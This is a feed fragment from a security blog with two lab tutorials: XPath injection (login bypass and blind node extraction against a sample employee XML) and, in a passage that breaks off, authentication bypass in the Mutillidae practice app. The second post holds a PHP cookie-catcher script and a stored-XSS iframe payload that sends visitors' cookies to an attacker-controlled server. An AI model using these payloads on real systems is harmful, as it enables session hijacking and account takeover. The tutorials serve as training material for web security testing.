url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiw8uPhy3lTa0Xrvwogv3Acl28BXuTCqkQM6UC_Q1QyFuKcEImb3oX29GpTcRSvjdLOKr9S8vivZhOGw-oBTEXoQiTRsU6ap1ndBTIPmfZrXsRwTRAyqrHi_aEUb3UmvEEh9FY6eTdVlus/s72-c/jigsaw.PNG" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-2674033033338498238</id><published>2013-11-29T18:44:00.000+05:30</published><updated>2013-12-14T12:29:05.263+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="authentication-bypass"/><category scheme="http://www.blogger.com/atom/ns#" term="XPATH Injection"/><title type='text'>XPATH Injection Tutorial</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.&lt;br /&gt;
&lt;br /&gt;
We are gonna learn using simple example. Download code from &lt;a href=&quot;http://www.4shared.com/zip/SleYPtv8/xpath.html&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; &amp;amp; put it in your local server directory.(Code is created by &lt;a href=&quot;https://twitter.com/amolnaik4&quot; target=&quot;_blank&quot;&gt;Amol Naik &lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
Sample XML Document which we gonna use:-&lt;br /&gt;
&lt;br /&gt;
&amp;lt;Employees&amp;gt;
&lt;br /&gt;
&amp;lt;!-- Employees Database --&amp;gt;
&lt;br /&gt;
&amp;nbsp; &amp;lt;Employee ID=&quot;1&quot;&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;FirstName&amp;gt;Johnny&amp;lt;/FirstName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;LastName&amp;gt;Bravo&amp;lt;/LastName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;UserName&amp;gt;jbravo&amp;lt;/UserName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;Password&amp;gt;test123&amp;lt;/Password&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;Type&amp;gt;Admin&amp;lt;/Type&amp;gt;
&lt;br /&gt;
&amp;nbsp; &amp;lt;/Employee&amp;gt;
&lt;br /&gt;
&amp;nbsp; &amp;lt;Employee ID=&quot;2&quot;&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;FirstName&amp;gt;Mark&amp;lt;/FirstName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;LastName&amp;gt;Brown&amp;lt;/LastName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;UserName&amp;gt;mbrown&amp;lt;/UserName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;Password&amp;gt;demopass&amp;lt;/Password&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;Type&amp;gt;User&amp;lt;/Type&amp;gt;
&lt;br /&gt;
&amp;nbsp; &amp;lt;/Employee&amp;gt;
&lt;br /&gt;
&amp;nbsp; &amp;lt;Employee ID=&quot;3&quot;&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;FirstName&amp;gt;William&amp;lt;/FirstName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;LastName&amp;gt;Gates&amp;lt;/LastName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;UserName&amp;gt;wgates&amp;lt;/UserName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;Password&amp;gt;MSRocks!&amp;lt;/Password&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;Type&amp;gt;User&amp;lt;/Type&amp;gt;
&lt;br /&gt;
&amp;nbsp; &amp;lt;/Employee&amp;gt;
&lt;br /&gt;
&amp;nbsp; &amp;lt;Employee ID=&quot;4&quot;&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;FirstName&amp;gt;Chris&amp;lt;/FirstName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;LastName&amp;gt;Dawes&amp;lt;/LastName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;UserName&amp;gt;cdawes&amp;lt;/UserName&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;Password&amp;gt;letmein&amp;lt;/Password&amp;gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;lt;Type&amp;gt;User&amp;lt;/Type&amp;gt;
&lt;br /&gt;
&amp;nbsp; &amp;lt;/Employee&amp;gt;
&lt;br /&gt;
&amp;lt;/Employees&amp;gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Bypass Authentication:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
Browse to the login.php page; here we can see simple login form.&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGYl8oaumFmdeTVMbLrhh8ldQ5tqwpmOT4NABLwmcotvmO2L6B0-5EzAYngNDg3HnWR-RvcdcBVulj98ZuGcrtkkULP_sMLNsEx5dbBhYG-GZb0bWobQsWrcZd4yBXDE24v-_fM7J8xyV/s1600/login.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Bypass Authentication&quot; border=&quot;0&quot; height=&quot;174&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGYl8oaumFmdeTVMbLrhh8ldQ5tqwpmOT4NABLwmcotvmO2L6B0-5EzAYngNDg3HnWR-RvcdcBVulj98ZuGcrtkkULP_sMLNsEx5dbBhYG-GZb0bWobQsWrcZd4yBXDE24v-_fM7J8xyV/s320/login.PNG&quot; title=&quot;Bypass Authentication&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:&lt;br /&gt;
&lt;br /&gt;
Username: &#39; or &#39;1&#39; = &#39;1&lt;br /&gt;
Password:&amp;nbsp; &#39; or &#39;1&#39; = &#39;1&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjXsQhT3hPPiadmlv2guT0ksc30EtcsPNiujur5-q3pv6YXrnENXcqGumh0BMKwBQlABbZcZOJLepFDQOLN8TAoGeEqS5SSZ2rEgao2AfOuKLmAtHgk6beQCXGhv1g4QihCxOIPBiJNFo0/s1600/Bypass-Login.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Bypass Authentication using XPATH injection&quot; border=&quot;0&quot; height=&quot;164&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjXsQhT3hPPiadmlv2guT0ksc30EtcsPNiujur5-q3pv6YXrnENXcqGumh0BMKwBQlABbZcZOJLepFDQOLN8TAoGeEqS5SSZ2rEgao2AfOuKLmAtHgk6beQCXGhv1g4QihCxOIPBiJNFo0/s320/Bypass-Login.PNG&quot; title=&quot;Bypass Authentication using XPATH injection&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;Looks quite familiar, doesn&#39;t it? Using these parameters, the query becomes:&lt;br /&gt;
&lt;br /&gt;
string(//Employee[uname/text()=&#39;&#39; or &#39;1&#39; = &#39;1&#39; and passwd/text()=&#39;&#39; or &#39;1&#39; = &#39;1&#39;]/account/text())&lt;br /&gt;
&lt;br /&gt;
As in a common SQL Injection attack, we have created a query that is always evaluated as true, which means that the application will authenticate the user even if a username or a password have not been provided.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Blind Xpath Injection:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack whose goal is to reconstruct the whole data structure.&lt;br /&gt;
&lt;br /&gt;
Browse to the search.php page. Enter any number, When you provide number it will display FirstName related to their ID.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxtUkEjIL0yysOU5R6ng4yYBfcCurdyDlM0qiX8VYGx-n1CacCvlubzMfZTU_-yVWbKy0jkymJL3_WmK7gu0wDx-_jJRidTQ5_nyP9xaGh9FSMsuY6BZclc2nY-bUjSkmLS_03JMUSSrN/s1600/search-first-name.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Blind XPATH Injection&quot; border=&quot;0&quot; height=&quot;111&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxtUkEjIL0yysOU5R6ng4yYBfcCurdyDlM0qiX8VYGx-n1CacCvlubzMfZTU_-yVWbKy0jkymJL3_WmK7gu0wDx-_jJRidTQ5_nyP9xaGh9FSMsuY6BZclc2nY-bUjSkmLS_03JMUSSrN/s320/search-first-name.PNG&quot; title=&quot;Blind XPATH Injection&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Enter &#39; or &#39;1&#39; = &#39;1 in search , &amp;amp; you will get all FirstName regardless of any ID(Number).&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF_araG0wi4in9V52kiVZLNWyPvDJLYgQcCV_mlIvlPuNxXIdLMzFcNJWHtkFiUrj58pEROG12DQfvzdehi7QFKSGKqjq716MuIi2Wp03-uOAeXn-vFdxoTMZ3Gh6IZHlpt9fft1UFKlDX/s1600/Bypass.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Blind XPATH Injection&quot; border=&quot;0&quot; height=&quot;118&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF_araG0wi4in9V52kiVZLNWyPvDJLYgQcCV_mlIvlPuNxXIdLMzFcNJWHtkFiUrj58pEROG12DQfvzdehi7QFKSGKqjq716MuIi2Wp03-uOAeXn-vFdxoTMZ3Gh6IZHlpt9fft1UFKlDX/s320/Bypass.PNG&quot; title=&quot;Blind XPATH Injection&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
In blind Xpath injection we have to provide special crafted query to application, if query is true we will get result otherwise we will not get any result.Till now We don`t know about any parent or child node of XML document.&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
Guessing of parent node:-&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
Supply following query to application &amp;amp; observe result.&lt;br /&gt;
&lt;br /&gt;
&#39; or substring(name(parent::*[position()=1]),1,1)=&#39;a&lt;br /&gt;
&lt;br /&gt;
Nothing append , we don`t get FirstName of users.&lt;b&gt;It means first letter of parent node is not &quot;a&quot;&lt;/b&gt;. Now supply following query&lt;br /&gt;
&lt;br /&gt;
&#39; or substring(name(parent::*[position()=1]),1,1)=&#39;E&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifhiaiqk0ALhGhzE6E1r8h1sMpkD8FWZB9GpZ28kKr8aBCkkA4tRjRboFbQixgKBvVdiTMbyYkw8H11vyhvtidhztc17PaZnw2wbiSjd6vNM0QHtPPhJehmfcyTzbzLd4oucF3v6Pa_bk0/s1600/Blind-xpath.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Blind XPATH Injection&quot; border=&quot;0&quot; height=&quot;119&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifhiaiqk0ALhGhzE6E1r8h1sMpkD8FWZB9GpZ28kKr8aBCkkA4tRjRboFbQixgKBvVdiTMbyYkw8H11vyhvtidhztc17PaZnw2wbiSjd6vNM0QHtPPhJehmfcyTzbzLd4oucF3v6Pa_bk0/s320/Blind-xpath.PNG&quot; title=&quot;Blind XPATH Injection&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
You get result , &lt;b&gt;It means first letter of parent node is &quot;E&quot;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
To guess second letter of parent node supply following query&lt;br /&gt;
&lt;br /&gt;
&#39; or substring(name(parent::*[position()=1]),2,1)=&#39;m&lt;br /&gt;
&lt;br /&gt;
Following the same procedure, we can extract the full name of the parent node, which was found to be &#39;&lt;b&gt;Employee&lt;/b&gt;&#39;. &lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
We can also get child node. Browse to the xpath.php page &amp;amp; enter following query.&lt;br /&gt;
&lt;br /&gt;
//Employee[position()=3]/child::node()[position()=4]/text()&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh53D4Wq53LVHsxz2H7xIrv-C4WRQ4bQgJZv7jEHNHYpUgJQ2s1jblcJbyBYFd_1dlZrE5yt2sf46kRLeeSS3OFzRHKtet0gBJ0Q4Uf9GNdA41p3ixqrKKZ6uwS6u3e2rLe81f7dFPJToEG/s1600/Retriev+DATA.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;get-child-node&quot; border=&quot;0&quot; height=&quot;112&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh53D4Wq53LVHsxz2H7xIrv-C4WRQ4bQgJZv7jEHNHYpUgJQ2s1jblcJbyBYFd_1dlZrE5yt2sf46kRLeeSS3OFzRHKtet0gBJ0Q4Uf9GNdA41p3ixqrKKZ6uwS6u3e2rLe81f7dFPJToEG/s320/Retriev+DATA.PNG&quot; title=&quot;get-child-node&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
You got output from parent node Employee id 3 &amp;amp; child node whose position is 2.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
To get whole document put following query.&lt;br /&gt;
&lt;br /&gt;
//Employee&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKTfjCdYrRHBrsT3n7Hszqy50CkuU762ep4f-XTsJoXi7lGmQJTgKrFKKGalsFGi_GkbQ6RqGZfR9JckWnTUh4P2-du9OvQ-_M5ZYvllGEtrZlHx7leCWRD_76Bmkb18FZkRdlKbCkKv6r/s1600/GET-DATA.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Blind Xpath injection&quot; border=&quot;0&quot; height=&quot;192&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKTfjCdYrRHBrsT3n7Hszqy50CkuU762ep4f-XTsJoXi7lGmQJTgKrFKKGalsFGi_GkbQ6RqGZfR9JckWnTUh4P2-du9OvQ-_M5ZYvllGEtrZlHx7leCWRD_76Bmkb18FZkRdlKbCkKv6r/s320/GET-DATA.PNG&quot; title=&quot;Blind Xpath injection&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
It`s just concept how to retrieve data from XML document using XPATH injection.XPath contains two useful functions that can help you automate the preceding attack and quickly iterate through all nodes and data in the XML document:&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;count() returns the number of child nodes of a given element, which can be used to determine the range of position() values to iterate over.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;string-length() returns the length of a supplied string, which can be used to determine the range of substring() values to iterate over.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
I used recon-ng xpath bruteforcer for xpath injection attack &amp;amp; we will get back end XML file.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlBWF1wU1qjp1s4676woO2_Kd_T-ojBVnbM5Fh1sW_k8dESdByfA015j0QWY5n8Yc-EEODyIyyPQRJjgSXq6rWsm_2y6Z_If9ey3gaqsHcNa1jn2E83zPE4cp2jFbOq8bPtgHfyzw46e3K/s1600/Screenshot.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;xapth-bruteforcer&quot; border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlBWF1wU1qjp1s4676woO2_Kd_T-ojBVnbM5Fh1sW_k8dESdByfA015j0QWY5n8Yc-EEODyIyyPQRJjgSXq6rWsm_2y6Z_If9ey3gaqsHcNa1jn2E83zPE4cp2jFbOq8bPtgHfyzw46e3K/s320/Screenshot.png&quot; title=&quot;xapth-bruteforcer&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Useful Links &amp;amp; Blind XPATH injection Tools:-&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://www.owasp.org/index.php/XPATH_Injection&quot;&gt;https://www.owasp.org/index.php/XPATH_Injection&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/goog_913170007&quot;&gt;&lt;br /&gt;&lt;/a&gt;
&lt;a href=&quot;https://www.owasp.org/index.php/Blind_XPath_Injection&quot;&gt;https://www.owasp.org/index.php/Blind_XPath_Injection&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
XPATH BLIND EXPLORER:-&amp;nbsp; &lt;a href=&quot;http://code.google.com/p/xpath-blind-explorer/downloads/list&quot;&gt;http://code.google.com/p/xpath-blind-explorer/downloads/list&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
XCAT:-&amp;nbsp; &lt;a href=&quot;https://github.com/orf/xcat&quot;&gt;https://github.com/orf/xcat&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/2674033033338498238/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/11/xpath-injection-tutorial.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/2674033033338498238'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/2674033033338498238'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/11/xpath-injection-tutorial.html' title='XPATH Injection Tutorial'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGYl8oaumFmdeTVMbLrhh8ldQ5tqwpmOT4NABLwmcotvmO2L6B0-5EzAYngNDg3HnWR-RvcdcBVulj98ZuGcrtkkULP_sMLNsEx5dbBhYG-GZb0bWobQsWrcZd4yBXDE24v-_fM7J8xyV/s72-c/login.PNG" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-7852474013476962911</id><published>2013-11-20T14:04:00.001+05:30</published><updated>2013-11-20T14:04:50.940+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="authentication-bypass"/><category scheme="http://www.blogger.com/atom/ns#" term="mutillidae"/><title type='text'>Broken Authentication &amp; Session Management in Mutillidae</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.&lt;br /&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Authentication Bypass&lt;/li&gt;
&lt;li&gt;Privilege Escalation&lt;/li&gt;
&lt;li&gt;Username Enumeration&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;We have already covered &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/11/username-enumeration-in-mutillidae.html&quot; target=&quot;_blank&quot;&gt;Username enumeration&lt;/a&gt; in last article &amp;amp; we got valid username list which exist in database. Today we are going to use authentication bypass method.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Using cookie&lt;/li&gt;
&lt;li&gt;Using brute-force&lt;/li&gt;
&lt;li&gt;Using SQL injection&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
(1)Authentication Bypass using cookie:-&amp;nbsp;&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
As we know that , mutillidae is vulnerable to &lt;a href=&quot;http://tipstrickshack.blogspot.com/2012/10/how-to-do-xss-attack-on-website.html&quot; target=&quot;_blank&quot;&gt;XSS&lt;/a&gt;, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.&lt;br /&gt;&lt;br /&gt;http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php&lt;br /&gt;&lt;br /&gt;Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.&lt;br /&gt;&lt;br /&gt;Content of cookie_catcher.php :-&lt;br /&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;header (&quot;Location: http://192.168.56.1&quot;);&lt;br /&gt;$cookie = $_GET[&#39;c&#39;];&lt;br /&gt;$ip = getenv (&#39;REMOTE_ADDR&#39;);&lt;br /&gt;$date=date(&quot;j F, Y, g:i a&quot;);;&lt;br /&gt;$referer=getenv (&#39;HTTP_REFERER&#39;);&lt;br /&gt;$fp = fopen(&#39;cookies.html&#39;, &#39;a&#39;);&lt;br /&gt;fwrite($fp, &#39;Cookie: &#39;.$cookie.&#39;&amp;lt;br&amp;gt; IP: &#39; .$ip. &#39;&amp;lt;br&amp;gt; Date and Time: &#39; .$date. &#39;&amp;lt;br&amp;gt; Referer: &#39;.$referer.&#39;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&#39;);&lt;br /&gt;fclose($fp);&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;br /&gt;Upload your cookie_catcher.php to server. For demo i used my local apache server &amp;amp; after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time &amp;amp; date.&lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;Now as anonymous user , we will add blog entry.I used other OS on my virtual box for attack.&lt;br /&gt;&lt;br /&gt;(1)Open http://192.168.56.1/mutillidae/index.php?page=add-to-your-blog.php&lt;br /&gt;&lt;br /&gt;(2)Submit following html to blog&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;b&amp;gt; nirav k desai&amp;lt;/b&amp;gt;&lt;br /&gt;&amp;lt;u&amp;gt;help me&amp;lt;/u&amp;gt;&lt;br /&gt;&amp;lt;iframe
 frameboarder=0 height=0 width=0 
src=javascript:void(document.location=&quot;http://192.168.56.1/cookie_catcher.php?c=&quot;+document.cookie)
 &amp;lt;/iframe &amp;gt;&lt;br /&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt; &lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgayRKvGYMdF1B6oQNdG-yIeoMMz2ohICjCxnjvVZv_WDLmqOnLKza439WUq15vi_GoGRG6_8bxD5XtQArpoI2EuoayGnewB6FhLvdPqROw2sP9fk1Uy4EVWx6c7z_ai8H2s4hzkft9r3GP/s1600/attacker.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;authentication-bypass-using-cokkie&quot; border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgayRKvGYMdF1B6oQNdG-yIeoMMz2ohICjCxnjvVZv_WDLmqOnLKza439WUq15vi_GoGRG6_8bxD5XtQArpoI2EuoayGnewB6FhLvdPqROw2sP9fk1Uy4EVWx6c7z_ai8H2s4hzkft9r3GP/s320/attacker.png&quot; title=&quot;authentication-bypass-using-cokkie&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Replace Link http://192.168.56.1/cookie_catcher.php to your uploaded cookie_catcher.php&lt;br /&gt;&lt;br /&gt;(3)Now when &quot;admin&quot; or any &quot;logged user&quot; show your added blog entry , you will get his cookie, i.p., date &amp;amp; time.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVN7yCCa9W147vx3HJIT5Er6T8b4GHY6PEwcU1t6_geD2PqN1EUHrISdSn7r5lIDOTMUmEZJz3PEzvshXE9nPNEPC8JQgTzFvvNxjBrBsoWNoZ3VuD2wWrgBWPjkyITMV6xBxgWAq73LXk/s1600/admin.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;persistent-xss&quot; border=&quot;0&quot; height=&quot;129&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVN7yCCa9W147vx3HJIT5Er6T8b4GHY6PEwcU1t6_geD2PqN1EUHrISdSn7r5lIDOTMUmEZJz3PEzvshXE9nPNEPC8JQgTzFvvNxjBrBsoWNoZ3VuD2wWrgBWPjkyITMV6xBxgWAq73LXk/s320/admin.PNG&quot; title=&quot;persistent-xss&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
